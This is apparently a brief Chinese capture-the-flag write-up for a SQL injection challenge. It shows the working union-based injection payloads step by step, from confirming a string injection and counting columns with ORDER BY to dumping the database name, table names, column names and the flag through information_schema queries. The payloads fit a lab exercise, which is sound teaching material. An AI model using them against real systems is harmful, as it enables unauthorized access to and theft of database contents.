查看源代码中的提示,先传入一个1试试看
可以成功读出数据
通过1' and 1=1 --+ 和 1' and 1=2 --+,判断存在字符型注入
接下来判断字段数
传入1' order by 4 --+爆错,判断只有三个字段数
通过联合查询判断我们的注入点
0' union select 1,2,3 --+
最后是枯燥的在information_schema库中找对应的表名和字段名
爆库,test_db
?wllm=-1’ union select 1,2,database()–+
爆表,test_tb,users
?wllm=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘test_db’–+
爆列
?wllm=-1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘test_tb’–+
爆值
?wllm=-1’ union select 1,2,flag from test_tb–+